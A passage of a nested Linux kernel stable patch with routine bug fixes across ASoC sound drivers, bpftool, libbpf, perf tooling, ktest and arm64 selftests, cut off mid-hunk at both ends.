+ 		rtd->fe_compr = 1;
+ 		if (rtd->dai_link->dpcm_playback)
+ 			be_pcm->streams[SNDRV_PCM_STREAM_PLAYBACK].substream->private_data = rtd;
+-		else if (rtd->dai_link->dpcm_capture)
++		if (rtd->dai_link->dpcm_capture)
+ 			be_pcm->streams[SNDRV_PCM_STREAM_CAPTURE].substream->private_data = rtd;
+ 		memcpy(compr->ops, &soc_compr_dyn_ops, sizeof(soc_compr_dyn_ops));
+ 	} else {
+diff --git a/sound/soc/soc-topology.c b/sound/soc/soc-topology.c
+index a79a2fb260b87..d68c48555a7e3 100644
+--- a/sound/soc/soc-topology.c
++++ b/sound/soc/soc-topology.c
+@@ -2408,7 +2408,7 @@ static int soc_valid_header(struct soc_tplg *tplg,
+ 		return -EINVAL;
+ 	}
+ 
+-	if (soc_tplg_get_hdr_offset(tplg) + hdr->payload_size >= tplg->fw->size) {
++	if (soc_tplg_get_hdr_offset(tplg) + le32_to_cpu(hdr->payload_size) >= tplg->fw->size) {
+ 		dev_err(tplg->dev,
+ 			"ASoC: invalid header of type %d at offset %ld payload_size %d\n",
+ 			le32_to_cpu(hdr->type), soc_tplg_get_hdr_offset(tplg),
+diff --git a/tools/bootconfig/scripts/ftrace2bconf.sh b/tools/bootconfig/scripts/ftrace2bconf.sh
+index 6183b36c68466..1603801cf1264 100755
+--- a/tools/bootconfig/scripts/ftrace2bconf.sh
++++ b/tools/bootconfig/scripts/ftrace2bconf.sh
+@@ -93,7 +93,7 @@ referred_vars() {
+ }
+ 
+ event_is_enabled() { # enable-file
+-	test -f $1 & grep -q "1" $1
++	test -f $1 && grep -q "1" $1
+ }
+ 
+ per_event_options() { # event-dir
+diff --git a/tools/bpf/bpftool/Makefile b/tools/bpf/bpftool/Makefile
+index f610e184ce02a..270066aff8bf1 100644
+--- a/tools/bpf/bpftool/Makefile
++++ b/tools/bpf/bpftool/Makefile
+@@ -215,7 +215,8 @@ $(OUTPUT)%.bpf.o: skeleton/%.bpf.c $(OUTPUT)vmlinux.h $(LIBBPF_BOOTSTRAP)
+ 		-I$(or $(OUTPUT),.) \
+ 		-I$(srctree)/tools/include/uapi/ \
+ 		-I$(LIBBPF_BOOTSTRAP_INCLUDE) \
+-		-g -O2 -Wall -target bpf -c $< -o $@
++		-g -O2 -Wall -fno-stack-protector \
++		-target bpf -c $< -o $@
+ 	$(Q)$(LLVM_STRIP) -g $@
+ 
+ $(OUTPUT)%.skel.h: $(OUTPUT)%.bpf.o $(BPFTOOL_BOOTSTRAP)
+diff --git a/tools/bpf/bpftool/prog.c b/tools/bpf/bpftool/prog.c
+index cfc9fdc1e8634..e87738dbffc10 100644
+--- a/tools/bpf/bpftool/prog.c
++++ b/tools/bpf/bpftool/prog.c
+@@ -2233,10 +2233,38 @@ static void profile_close_perf_events(struct profiler_bpf *obj)
+ 	profile_perf_event_cnt = 0;
+ }
+ 
++static int profile_open_perf_event(int mid, int cpu, int map_fd)
++{
++	int pmu_fd;
++
++	pmu_fd = syscall(__NR_perf_event_open, &metrics[mid].attr,
++			 -1 /*pid*/, cpu, -1 /*group_fd*/, 0);
++	if (pmu_fd < 0) {
++		if (errno == ENODEV) {
++			p_info("cpu %d may be offline, skip %s profiling.",
++				cpu, metrics[mid].name);
++			profile_perf_event_cnt++;
++			return 0;
++		}
++		return -1;
++	}
++
++	if (bpf_map_update_elem(map_fd,
++				&profile_perf_event_cnt,
++				&pmu_fd, BPF_ANY) ||
++	    ioctl(pmu_fd, PERF_EVENT_IOC_ENABLE, 0)) {
++		close(pmu_fd);
++		return -1;
++	}
++
++	profile_perf_events[profile_perf_event_cnt++] = pmu_fd;
++	return 0;
++}
++
+ static int profile_open_perf_events(struct profiler_bpf *obj)
+ {
+ 	unsigned int cpu, m;
+-	int map_fd, pmu_fd;
++	int map_fd;
+ 
+ 	profile_perf_events = calloc(
+ 		sizeof(int), obj->rodata->num_cpu * obj->rodata->num_metric);
+@@ -2255,17 +2283,11 @@ static int profile_open_perf_events(struct profiler_bpf *obj)
+ 		if (!metrics[m].selected)
+ 			continue;
+ 		for (cpu = 0; cpu < obj->rodata->num_cpu; cpu++) {
+-			pmu_fd = syscall(__NR_perf_event_open, &metrics[m].attr,
+-					 -1/*pid*/, cpu, -1/*group_fd*/, 0);
+-			if (pmu_fd < 0 ||
+-			    bpf_map_update_elem(map_fd, &profile_perf_event_cnt,
+-						&pmu_fd, BPF_ANY) ||
+-			    ioctl(pmu_fd, PERF_EVENT_IOC_ENABLE, 0)) {
++			if (profile_open_perf_event(m, cpu, map_fd)) {
+ 				p_err("failed to create event %s on cpu %d",
+ 				      metrics[m].name, cpu);
+ 				return -1;
+ 			}
+-			profile_perf_events[profile_perf_event_cnt++] = pmu_fd;
+ 		}
+ 	}
+ 	return 0;
+diff --git a/tools/lib/bpf/bpf_tracing.h b/tools/lib/bpf/bpf_tracing.h
+index 2972dc25ff722..9c1b1689068d1 100644
+--- a/tools/lib/bpf/bpf_tracing.h
++++ b/tools/lib/bpf/bpf_tracing.h
+@@ -137,7 +137,7 @@ struct pt_regs___s390 {
+ #define __PT_PARM3_REG gprs[4]
+ #define __PT_PARM4_REG gprs[5]
+ #define __PT_PARM5_REG gprs[6]
+-#define __PT_RET_REG grps[14]
++#define __PT_RET_REG gprs[14]
+ #define __PT_FP_REG gprs[11]	/* Works only with CONFIG_FRAME_POINTER */
+ #define __PT_RC_REG gprs[2]
+ #define __PT_SP_REG gprs[15]
+diff --git a/tools/lib/bpf/btf.c b/tools/lib/bpf/btf.c
+index 71e165b09ed59..8cbcef959456d 100644
+--- a/tools/lib/bpf/btf.c
++++ b/tools/lib/bpf/btf.c
+@@ -688,8 +688,21 @@ int btf__align_of(const struct btf *btf, __u32 id)
+ 			if (align <= 0)
+ 				return libbpf_err(align);
+ 			max_align = max(max_align, align);
++
++			/* if field offset isn't aligned according to field
++			 * type's alignment, then struct must be packed
++			 */
++			if (btf_member_bitfield_size(t, i) == 0 &&
++			    (m->offset % (8 * align)) != 0)
++				return 1;
+ 		}
+ 
++		/* if struct/union size isn't a multiple of its alignment,
++		 * then struct must be packed
++		 */
++		if ((t->size % max_align) != 0)
++			return 1;
++
+ 		return max_align;
+ 	}
+ 	default:
+diff --git a/tools/lib/bpf/btf_dump.c b/tools/lib/bpf/btf_dump.c
+index deb2bc9a0a7b0..69e80ee5f70e2 100644
+--- a/tools/lib/bpf/btf_dump.c
++++ b/tools/lib/bpf/btf_dump.c
+@@ -959,9 +959,12 @@ static void btf_dump_emit_struct_def(struct btf_dump *d,
+ 	 * Keep `struct empty {}` on a single line,
+ 	 * only print newline when there are regular or padding fields.
+ 	 */
+-	if (vlen || t->size)
++	if (vlen || t->size) {
+ 		btf_dump_printf(d, "\n");
+-	btf_dump_printf(d, "%s}", pfx(lvl));
++		btf_dump_printf(d, "%s}", pfx(lvl));
++	} else {
++		btf_dump_printf(d, "}");
++	}
+ 	if (packed)
+ 		btf_dump_printf(d, " __attribute__((packed))");
+ }
+diff --git a/tools/lib/bpf/libbpf.c b/tools/lib/bpf/libbpf.c
+index 2a82f49ce16f3..adf818da35dda 100644
+--- a/tools/lib/bpf/libbpf.c
++++ b/tools/lib/bpf/libbpf.c
+@@ -7355,7 +7355,7 @@ static int bpf_object__sanitize_maps(struct bpf_object *obj)
+ 		if (!bpf_map__is_internal(m))
+ 			continue;
+ 		if (!kernel_supports(obj, FEAT_ARRAY_MMAP))
+-			m->def.map_flags ^= BPF_F_MMAPABLE;
++			m->def.map_flags &= ~BPF_F_MMAPABLE;
+ 	}
+ 
+ 	return 0;
+diff --git a/tools/lib/bpf/nlattr.c b/tools/lib/bpf/nlattr.c
+index 3900d052ed19e..975e265eab3bf 100644
+--- a/tools/lib/bpf/nlattr.c
++++ b/tools/lib/bpf/nlattr.c
+@@ -178,7 +178,7 @@ int libbpf_nla_dump_errormsg(struct nlmsghdr *nlh)
+ 		hlen += nlmsg_len(&err->msg);
+ 
+ 	attr = (struct nlattr *) ((void *) err + hlen);
+-	alen = nlh->nlmsg_len - hlen;
++	alen = (void *)nlh + nlh->nlmsg_len - (void *)attr;
+ 
+ 	if (libbpf_nla_parse(tb, NLMSGERR_ATTR_MAX, attr, alen,
+ 			     extack_policy) != 0) {
+diff --git a/tools/lib/thermal/sampling.c b/tools/lib/thermal/sampling.c
+index ee818f4e9654d..70577423a9f0c 100644
+--- a/tools/lib/thermal/sampling.c
++++ b/tools/lib/thermal/sampling.c
+@@ -54,7 +54,7 @@ int thermal_sampling_fd(struct thermal_handler *th)
+ thermal_error_t thermal_sampling_exit(struct thermal_handler *th)
+ {
+ 	if (nl_unsubscribe_thermal(th->sk_sampling, th->cb_sampling,
+-				   THERMAL_GENL_EVENT_GROUP_NAME))
++				   THERMAL_GENL_SAMPLING_GROUP_NAME))
+ 		return THERMAL_ERROR;
+ 
+ 	nl_thermal_disconnect(th->sk_sampling, th->cb_sampling);
+diff --git a/tools/objtool/check.c b/tools/objtool/check.c
+index 4b7c8b33069e5..b1a5f658673f0 100644
+--- a/tools/objtool/check.c
++++ b/tools/objtool/check.c
+@@ -1186,6 +1186,8 @@ static const char *uaccess_safe_builtin[] = {
+ 	"__tsan_atomic64_compare_exchange_val",
+ 	"__tsan_atomic_thread_fence",
+ 	"__tsan_atomic_signal_fence",
++	"__tsan_unaligned_read16",
++	"__tsan_unaligned_write16",
+ 	/* KCOV */
+ 	"write_comp_data",
+ 	"check_kcov_mode",
+diff --git a/tools/perf/Documentation/perf-intel-pt.txt b/tools/perf/Documentation/perf-intel-pt.txt
+index 7b6ccd2fa3bf1..9d485a9cdb198 100644
+--- a/tools/perf/Documentation/perf-intel-pt.txt
++++ b/tools/perf/Documentation/perf-intel-pt.txt
+@@ -1821,6 +1821,36 @@ Can be compiled and traced:
+  $
+ 
+ 
++Pipe mode
++---------
++Pipe mode is a problem for Intel PT and possibly other auxtrace users.
++It's not recommended to use a pipe as data output with Intel PT because
++of the following reason.
++
++Essentially the auxtrace buffers do not behave like the regular perf
++event buffers.  That is because the head and tail are updated by
++software, but in the auxtrace case the data is written by hardware.
++So the head and tail do not get updated as data is written.
++
++In the Intel PT case, the head and tail are updated only when the trace
++is disabled by software, for example:
++    - full-trace, system wide : when buffer passes watermark
++    - full-trace, not system-wide : when buffer passes watermark or
++                                    context switches
++    - snapshot mode : as above but also when a snapshot is made
++    - sample mode : as above but also when a sample is made
++
++That means finished-round ordering doesn't work.  An auxtrace buffer
++can turn up that has data that extends back in time, possibly to the
++very beginning of tracing.
++
++For a perf.data file, that problem is solved by going through the trace
++and queuing up the auxtrace buffers in advance.
++
++For pipe mode, the order of events and timestamps can presumably
++be messed up.
++
++
+ EXAMPLE
+ -------
+ 
+diff --git a/tools/perf/builtin-inject.c b/tools/perf/builtin-inject.c
+index 3f4e4dd5abf31..f8182417b7341 100644
+--- a/tools/perf/builtin-inject.c
++++ b/tools/perf/builtin-inject.c
+@@ -215,14 +215,14 @@ static int perf_event__repipe_event_update(struct perf_tool *tool,
+ 
+ #ifdef HAVE_AUXTRACE_SUPPORT
+ 
+-static int copy_bytes(struct perf_inject *inject, int fd, off_t size)
++static int copy_bytes(struct perf_inject *inject, struct perf_data *data, off_t size)
+ {
+ 	char buf[4096];
+ 	ssize_t ssz;
+ 	int ret;
+ 
+ 	while (size > 0) {
+-		ssz = read(fd, buf, min(size, (off_t)sizeof(buf)));
++		ssz = perf_data__read(data, buf, min(size, (off_t)sizeof(buf)));
+ 		if (ssz < 0)
+ 			return -errno;
+ 		ret = output_bytes(inject, buf, ssz);
+@@ -260,7 +260,7 @@ static s64 perf_event__repipe_auxtrace(struct perf_session *session,
+ 		ret = output_bytes(inject, event, event->header.size);
+ 		if (ret < 0)
+ 			return ret;
+-		ret = copy_bytes(inject, perf_data__fd(session->data),
++		ret = copy_bytes(inject, session->data,
+ 				 event->auxtrace.size);
+ 	} else {
+ 		ret = output_bytes(inject, event,
+diff --git a/tools/perf/builtin-record.c b/tools/perf/builtin-record.c
+index 29dcd454b8e21..8374117e66f6e 100644
+--- a/tools/perf/builtin-record.c
++++ b/tools/perf/builtin-record.c
+@@ -154,6 +154,7 @@ struct record {
+ 	struct perf_tool	tool;
+ 	struct record_opts	opts;
+ 	u64			bytes_written;
++	u64			thread_bytes_written;
+ 	struct perf_data	data;
+ 	struct auxtrace_record	*itr;
+ 	struct evlist	*evlist;
+@@ -226,14 +227,7 @@ static bool switch_output_time(struct record *rec)
+ 
+ static u64 record__bytes_written(struct record *rec)
+ {
+-	int t;
+-	u64 bytes_written = rec->bytes_written;
+-	struct record_thread *thread_data = rec->thread_data;
+-
+-	for (t = 0; t < rec->nr_threads; t++)
+-		bytes_written += thread_data[t].bytes_written;
+-
+-	return bytes_written;
++	return rec->bytes_written + rec->thread_bytes_written;
+ }
+ 
+ static bool record__output_max_size_exceeded(struct record *rec)
+@@ -255,10 +249,12 @@ static int record__write(struct record *rec, struct mmap *map __maybe_unused,
+ 		return -1;
+ 	}
+ 
+-	if (map && map->file)
++	if (map && map->file) {
+ 		thread->bytes_written += size;
+-	else
++		rec->thread_bytes_written += size;
++	} else {
+ 		rec->bytes_written += size;
++	}
+ 
+ 	if (record__output_max_size_exceeded(rec) && !done) {
+ 		fprintf(stderr, "[ perf record: perf size limit reached (%" PRIu64 " KB),"
+diff --git a/tools/perf/perf-completion.sh b/tools/perf/perf-completion.sh
+index fdf75d45efff7..978249d7868c2 100644
+--- a/tools/perf/perf-completion.sh
++++ b/tools/perf/perf-completion.sh
+@@ -165,7 +165,12 @@ __perf_main ()
+ 
+ 		local cur1=${COMP_WORDS[COMP_CWORD]}
+ 		local raw_evts=$($cmd list --raw-dump)
+-		local arr s tmp result
++		local arr s tmp result cpu_evts
++
++		# aarch64 doesn't have /sys/bus/event_source/devices/cpu/events
++		if [[ `uname -m` != aarch64 ]]; then
++			cpu_evts=$(ls /sys/bus/event_source/devices/cpu/events)
++		fi
+ 
+ 		if [[ "$cur1" == */* && ${cur1#*/} =~ ^[A-Z] ]]; then
+ 			OLD_IFS="$IFS"
+@@ -183,9 +188,9 @@ __perf_main ()
+ 				fi
+ 			done
+ 
+-			evts=${result}" "$(ls /sys/bus/event_source/devices/cpu/events)
++			evts=${result}" "${cpu_evts}
+ 		else
+-			evts=${raw_evts}" "$(ls /sys/bus/event_source/devices/cpu/events)
++			evts=${raw_evts}" "${cpu_evts}
+ 		fi
+ 
+ 		if [[ "$cur1" == , ]]; then
+diff --git a/tools/perf/pmu-events/metric_test.py b/tools/perf/pmu-events/metric_test.py
+index 15315d0f716ca..6980f452df0ad 100644
+--- a/tools/perf/pmu-events/metric_test.py
++++ b/tools/perf/pmu-events/metric_test.py
+@@ -87,8 +87,8 @@ class TestMetricExpressions(unittest.TestCase):
+     after = r'min((a + b if c > 1 else c + d), e + f)'
+     self.assertEqual(ParsePerfJson(before).ToPerfJson(), after)
+ 
+-    before =3D r'a if b else c if d else e'
+-    after =3D r'(a if b else (c if d else e))'
++    before = r'a if b else c if d else e'
++    after = r'(a if b else (c if d else e))'
+     self.assertEqual(ParsePerfJson(before).ToPerfJson(), after)
+ 
+   def test_ToPython(self):
+diff --git a/tools/perf/tests/bpf.c b/tools/perf/tests/bpf.c
+index 17c023823713d..6a4235a9cf57e 100644
+--- a/tools/perf/tests/bpf.c
++++ b/tools/perf/tests/bpf.c
+@@ -126,6 +126,10 @@ static int do_test(struct bpf_object *obj, int (*func)(void),
+ 
+ 	err = parse_events_load_bpf_obj(&parse_state, &parse_state.list, obj, NULL);
+ 	parse_events_error__exit(&parse_error);
++	if (err == -ENODATA) {
++		pr_debug("Failed to add events selected by BPF, debuginfo package not installed\n");
++		return TEST_SKIP;
++	}
+ 	if (err || list_empty(&parse_state.list)) {
+ 		pr_debug("Failed to add events selected by BPF\n");
+ 		return TEST_FAIL;
+@@ -368,7 +372,7 @@ static struct test_case bpf_tests[] = {
+ 			"clang isn't installed or environment missing BPF support"),
+ #ifdef HAVE_BPF_PROLOGUE
+ 	TEST_CASE_REASON("BPF prologue generation", bpf_prologue_test,
+-			"clang isn't installed or environment missing BPF support"),
++			"clang/debuginfo isn't installed or environment missing BPF support"),
+ #else
+ 	TEST_CASE_REASON("BPF prologue generation", bpf_prologue_test, "not compiled in"),
+ #endif
+diff --git a/tools/perf/tests/shell/stat_all_metrics.sh b/tools/perf/tests/shell/stat_all_metrics.sh
+index 6e79349e42bef..22e9cb294b40e 100755
+--- a/tools/perf/tests/shell/stat_all_metrics.sh
++++ b/tools/perf/tests/shell/stat_all_metrics.sh
+@@ -11,7 +11,7 @@ for m in $(perf list --raw-dump metrics); do
+     continue
+   fi
+   # Failed so try system wide.
+-  result=$(perf stat -M "$m" -a true 2>&1)
++  result=$(perf stat -M "$m" -a sleep 0.01 2>&1)
+   if [[ "$result" =~ "${m:0:50}" ]]
+   then
+     continue
+diff --git a/tools/perf/util/auxtrace.c b/tools/perf/util/auxtrace.c
+index c2e323cd7d496..d4b04fa07a119 100644
+--- a/tools/perf/util/auxtrace.c
++++ b/tools/perf/util/auxtrace.c
+@@ -1133,6 +1133,9 @@ int auxtrace_queue_data(struct perf_session *session, bool samples, bool events)
+ 	if (auxtrace__dont_decode(session))
+ 		return 0;
+ 
++	if (perf_data__is_pipe(session->data))
++		return 0;
++
+ 	if (!session->auxtrace || !session->auxtrace->queue_data)
+ 		return -EINVAL;
+ 
+diff --git a/tools/perf/util/intel-pt.c b/tools/perf/util/intel-pt.c
+index 6d3921627e332..b8b29756fbf13 100644
+--- a/tools/perf/util/intel-pt.c
++++ b/tools/perf/util/intel-pt.c
+@@ -4379,6 +4379,12 @@ int intel_pt_process_auxtrace_info(union perf_event *event,
+ 
+ 	intel_pt_setup_pebs_events(pt);
+ 
++	if (perf_data__is_pipe(session->data)) {
++		pr_warning("WARNING: Intel PT with pipe mode is not recommended.\n"
++			   "         The output cannot relied upon.  In particular,\n"
++			   "         timestamps and the order of events may be incorrect.\n");
++	}
++
+ 	if (pt->sampling_mode || list_empty(&session->auxtrace_index))
+ 		err = auxtrace_queue_data(session, true, true);
+ 	else
+diff --git a/tools/perf/util/llvm-utils.c b/tools/perf/util/llvm-utils.c
+index 650ffe336f3aa..4e8e243a6e4bd 100644
+--- a/tools/perf/util/llvm-utils.c
++++ b/tools/perf/util/llvm-utils.c
+@@ -531,14 +531,37 @@ int llvm__compile_bpf(const char *path, void **p_obj_buf,
+ 
+ 	pr_debug("llvm compiling command template: %s\n", template);
+ 
++	/*
++	 * Below, substitute control characters for values that can cause the
++	 * echo to misbehave, then substitute the values back.
++	 */
+ 	err = -ENOMEM;
+-	if (asprintf(&command_echo, "echo -n \"%s\"", template) < 0)
++	if (asprintf(&command_echo, "echo -n \a%s\a", template) < 0)
+ 		goto errout;
+ 
++#define SWAP_CHAR(a, b) do { if (*p == a) *p = b; } while (0)
++	for (char *p = command_echo; *p; p++) {
++		SWAP_CHAR('<', '\001');
++		SWAP_CHAR('>', '\002');
++		SWAP_CHAR('"', '\003');
++		SWAP_CHAR('\'', '\004');
++		SWAP_CHAR('|', '\005');
++		SWAP_CHAR('&', '\006');
++		SWAP_CHAR('\a', '"');
++	}
+ 	err = read_from_pipe(command_echo, (void **) &command_out, NULL);
+ 	if (err)
+ 		goto errout;
+ 
++	for (char *p = command_out; *p; p++) {
++		SWAP_CHAR('\001', '<');
++		SWAP_CHAR('\002', '>');
++		SWAP_CHAR('\003', '"');
++		SWAP_CHAR('\004', '\'');
++		SWAP_CHAR('\005', '|');
++		SWAP_CHAR('\006', '&');
++	}
++#undef SWAP_CHAR
+ 	pr_debug("llvm compiling command : %s\n", command_out);
+ 
+ 	err = read_from_pipe(template, &obj_buf, &obj_buf_sz);
+diff --git a/tools/perf/util/stat-display.c b/tools/perf/util/stat-display.c
+index 8bd8b0142630c..1b5cb20efd237 100644
+--- a/tools/perf/util/stat-display.c
++++ b/tools/perf/util/stat-display.c
+@@ -787,6 +787,51 @@ static void uniquify_counter(struct perf_stat_config *config, struct evsel *coun
+ 		uniquify_event_name(counter);
+ }
+ 
++/**
++ * should_skip_zero_count() - Check if the event should print 0 values.
++ * @config: The perf stat configuration (including aggregation mode).
++ * @counter: The evsel with its associated cpumap.
++ * @id: The aggregation id that is being queried.
++ *
++ * Due to mismatch between the event cpumap or thread-map and the
++ * aggregation mode, sometimes it'd iterate the counter with the map
++ * which does not contain any values.
++ *
++ * For example, uncore events have dedicated CPUs to manage them,
++ * result for other CPUs should be zero and skipped.
++ *
++ * Return: %true if the value should NOT be printed, %false if the value
++ * needs to be printed like "<not counted>" or "<not supported>".
++ */
++static bool should_skip_zero_counter(struct perf_stat_config *config,
++				     struct evsel *counter,
++				     const struct aggr_cpu_id *id)
++{
++	struct perf_cpu cpu;
++	int idx;
++
++	/*
++	 * Skip value 0 when enabling --per-thread globally,
++	 * otherwise it will have too many 0 output.
++	 */
++	if (config->aggr_mode == AGGR_THREAD && config->system_wide)
++		return true;
++	/*
++	 * Skip value 0 when it's an uncore event and the given aggr id
++	 * does not belong to the PMU cpumask.
++	 */
++	if (!counter->pmu || !counter->pmu->is_uncore)
++		return false;
++
++	perf_cpu_map__for_each_cpu(cpu, idx, counter->pmu->cpus) {
++		struct aggr_cpu_id own_id = config->aggr_get_id(config, cpu);
++
++		if (aggr_cpu_id__equal(id, &own_id))
++			return false;
++	}
++	return true;
++}
++
+ static void print_counter_aggrdata(struct perf_stat_config *config,
+ 				   struct evsel *counter, int s,
+ 				   struct outstate *os)
+@@ -814,11 +859,7 @@ static void print_counter_aggrdata(struct perf_stat_config *config,
+ 	ena = aggr->counts.ena;
+ 	run = aggr->counts.run;
+ 
+-	/*
+-	 * Skip value 0 when enabling --per-thread globally, otherwise it will
+-	 * have too many 0 output.
+-	 */
+-	if (val == 0 && config->aggr_mode == AGGR_THREAD && config->system_wide)
++	if (val == 0 && should_skip_zero_counter(config, counter, &id))
+ 		return;
+ 
+ 	if (!metric_only) {
+diff --git a/tools/perf/util/stat-shadow.c b/tools/perf/util/stat-shadow.c
+index cadb2df23c878..4cd05d9205e3b 100644
+--- a/tools/perf/util/stat-shadow.c
++++ b/tools/perf/util/stat-shadow.c
+@@ -311,7 +311,7 @@ void perf_stat__update_shadow_stats(struct evsel *counter, u64 count,
+ 		update_stats(&v->stats, count);
+ 		if (counter->metric_leader)
+ 			v->metric_total += count;
+-	} else if (counter->metric_leader) {
++	} else if (counter->metric_leader && !counter->merged_stat) {
+ 		v = saved_value_lookup(counter->metric_leader,
+ 				       map_idx, true, STAT_NONE, 0, st, rsd.cgrp);
+ 		v->metric_total += count;
+diff --git a/tools/power/x86/intel-speed-select/isst-config.c b/tools/power/x86/intel-speed-select/isst-config.c
+index a160bad291eb7..be3668d37d654 100644
+--- a/tools/power/x86/intel-speed-select/isst-config.c
++++ b/tools/power/x86/intel-speed-select/isst-config.c
+@@ -110,7 +110,7 @@ int is_skx_based_platform(void)
+ 
+ int is_spr_platform(void)
+ {
+-	if (cpu_model == 0x8F)
++	if (cpu_model == 0x8F || cpu_model == 0xCF)
+ 		return 1;
+ 
+ 	return 0;
+diff --git a/tools/testing/ktest/ktest.pl b/tools/testing/ktest/ktest.pl
+index ac59999ed3ded..822794ca40292 100755
+--- a/tools/testing/ktest/ktest.pl
++++ b/tools/testing/ktest/ktest.pl
+@@ -178,6 +178,7 @@ my $store_failures;
+ my $store_successes;
+ my $test_name;
+ my $timeout;
++my $run_timeout;
+ my $connect_timeout;
+ my $config_bisect_exec;
+ my $booted_timeout;
+@@ -340,6 +341,7 @@ my %option_map = (
+     "STORE_SUCCESSES"		=> \$store_successes,
+     "TEST_NAME"			=> \$test_name,
+     "TIMEOUT"			=> \$timeout,
++    "RUN_TIMEOUT"		=> \$run_timeout,
+     "CONNECT_TIMEOUT"		=> \$connect_timeout,
+     "CONFIG_BISECT_EXEC"	=> \$config_bisect_exec,
+     "BOOTED_TIMEOUT"		=> \$booted_timeout,
+@@ -1495,7 +1497,8 @@ sub reboot {
+ 
+ 	# Still need to wait for the reboot to finish
+ 	wait_for_monitor($time, $reboot_success_line);
+-
++    }
++    if ($powercycle || $time) {
+ 	end_monitor;
+     }
+ }
+@@ -1857,6 +1860,14 @@ sub run_command {
+     $command =~ s/\$SSH_USER/$ssh_user/g;
+     $command =~ s/\$MACHINE/$machine/g;
+ 
++    if (!defined($timeout)) {
++	$timeout = $run_timeout;
++    }
++
++    if (!defined($timeout)) {
++	$timeout = -1; # tell wait_for_input to wait indefinitely
++    }
++
+     doprint("$command ... ");
+     $start_time = time;
+ 
+@@ -1883,13 +1894,10 @@ sub run_command {
+ 
+     while (1) {
+ 	my $fp = \*CMD;
+-	if (defined($timeout)) {
+-	    doprint "timeout = $timeout\n";
+-	}
+ 	my $line = wait_for_input($fp, $timeout);
+ 	if (!defined($line)) {
+ 	    my $now = time;
+-	    if (defined($timeout) && (($now - $start_time) >= $timeout)) {
++	    if ($timeout >= 0 && (($now - $start_time) >= $timeout)) {
+ 		doprint "Hit timeout of $timeout, killing process\n";
+ 		$hit_timeout = 1;
+ 		kill 9, $pid;
+@@ -2061,6 +2069,11 @@ sub wait_for_input {
+ 	$time = $timeout;
+     }
+ 
++    if ($time < 0) {
++	# Negative number means wait indefinitely
++	undef $time;
++    }
++
+     $rin = '';
+     vec($rin, fileno($fp), 1) = 1;
+     vec($rin, fileno(\*STDIN), 1) = 1;
+@@ -4200,6 +4213,9 @@ sub send_email {
+ }
+ 
+ sub cancel_test {
++    if ($monitor_cnt) {
++	end_monitor;
++    }
+     if ($email_when_canceled) {
+ 	my $name = get_test_name;
+ 	send_email("KTEST: Your [$name] test was cancelled",
+diff --git a/tools/testing/ktest/sample.conf b/tools/testing/ktest/sample.conf
+index 2d0fe15a096dd..f43477a9b8574 100644
+--- a/tools/testing/ktest/sample.conf
++++ b/tools/testing/ktest/sample.conf
+@@ -817,6 +817,11 @@
+ # is issued instead of a reboot.
+ # CONNECT_TIMEOUT = 25
+ 
++# The timeout in seconds for how long to wait for any running command
++# to timeout. If not defined, it will let it go indefinitely.
++# (default undefined)
++#RUN_TIMEOUT = 600
++
+ # In between tests, a reboot of the box may occur, and this
+ # is the time to wait for the console after it stops producing
+ # output. Some machines may not produce a large lag on reboot
+diff --git a/tools/testing/selftests/Makefile b/tools/testing/selftests/Makefile
+index 41b649452560c..06578963f4f1d 100644
+--- a/tools/testing/selftests/Makefile
++++ b/tools/testing/selftests/Makefile
+@@ -236,8 +236,8 @@ ifdef INSTALL_PATH
+ 	@# included in the generated runlist.
+ 	for TARGET in $(TARGETS); do \
+ 		BUILD_TARGET=$$BUILD/$$TARGET;	\
+-		[ ! -d $(INSTALL_PATH)/$$TARGET ] && echo "Skipping non-existent dir: $$TARGET" && continue; \
+-		echo -ne "Emit Tests for $$TARGET\n"; \
++		[ ! -d $(INSTALL_PATH)/$$TARGET ] && printf "Skipping non-existent dir: $$TARGET\n" && continue; \
++		printf "Emit Tests for $$TARGET\n"; \
+ 		$(MAKE) -s --no-print-directory OUTPUT=$$BUILD_TARGET COLLECTION=$$TARGET \
+ 			-C $$TARGET emit_tests >> $(TEST_LIST); \
+ 	done;
+diff --git a/tools/testing/selftests/arm64/abi/syscall-abi.c b/tools/testing/selftests/arm64/abi/syscall-abi.c
+index dd7ebe536d05f..ffe719b50c215 100644
+--- a/tools/testing/selftests/arm64/abi/syscall-abi.c
++++ b/tools/testing/selftests/arm64/abi/syscall-abi.c
+@@ -390,6 +390,10 @@ static void test_one_syscall(struct syscall_cfg *cfg)
+ 
+ 			sme_vl &= PR_SME_VL_LEN_MASK;
+ 
++			/* Found lowest VL */
++			if (sve_vq_from_vl(sme_vl) > sme_vq)
++				break;
++
+ 			if (sme_vq != sve_vq_from_vl(sme_vl))
+ 				sme_vq = sve_vq_from_vl(sme_vl);
+ 
+@@ -461,6 +465,10 @@ int sme_count_vls(void)
+ 
+ 		vl &= PR_SME_VL_LEN_MASK;
+ 
++		/* Found lowest VL */
++		if (sve_vq_from_vl(vl) > vq)
++			break;
++
+ 		if (vq != sve_vq_from_vl(vl))
+ 			vq = sve_vq_from_vl(vl);
+ 
+diff --git a/tools/testing/selftests/arm64/fp/Makefile b/tools/testing/selftests/arm64/fp/Makefile
+index 36db61358ed5b..932ec8792316d 100644
+--- a/tools/testing/selftests/arm64/fp/Makefile
++++ b/tools/testing/selftests/arm64/fp/Makefile
+@@ -3,7 +3,7 @@
+ # A proper top_srcdir is needed by KSFT(lib.mk)
+ top_srcdir = $(realpath ../../../../../)
+ 
+-CFLAGS += -I$(top_srcdir)/usr/include/
++CFLAGS += $(KHDR_INCLUDES)
+ 
+ TEST_GEN_PROGS := fp-stress \
+ 	sve-ptrace sve-probe-vls \
+diff --git a/tools/testing/selftests/arm64/signal/testcases/ssve_regs.c b/tools/testing/selftests/arm64/signal/testcases/ssve_regs.c
+index d0a178945b1a8..c6b17c47cac4c 100644
+--- a/tools/testing/selftests/arm64/signal/testcases/ssve_regs.c
++++ b/tools/testing/selftests/arm64/signal/testcases/ssve_regs.c
+@@ -34,6 +34,10 @@ static bool sme_get_vls(struct tdescr *td)
+ 
+ 		vl &= PR_SME_VL_LEN_MASK;
+ 
++		/* Did we find the lowest supported VL? */
++		if (vq < sve_vq_from_vl(vl))
++			break;
++
+ 		/* Skip missing VLs */
+ 		vq = sve_vq_from_vl(vl);
+ 
+diff --git a/tools/testing/selftests/arm64/signal/testcases/za_regs.c b/tools/testing/selftests/arm64/signal/testcases/za_regs.c
+index ea45acb115d5b..174ad66566964 100644
+--- a/tools/testing/selftests/arm64/signal/testcases/za_regs.c
++++ b/tools/testing/selftests/arm64/signal/testcases/za_regs.c
+@@ -34,6 +34,10 @@ static bool sme_get_vls(struct tdescr *td)
+ 
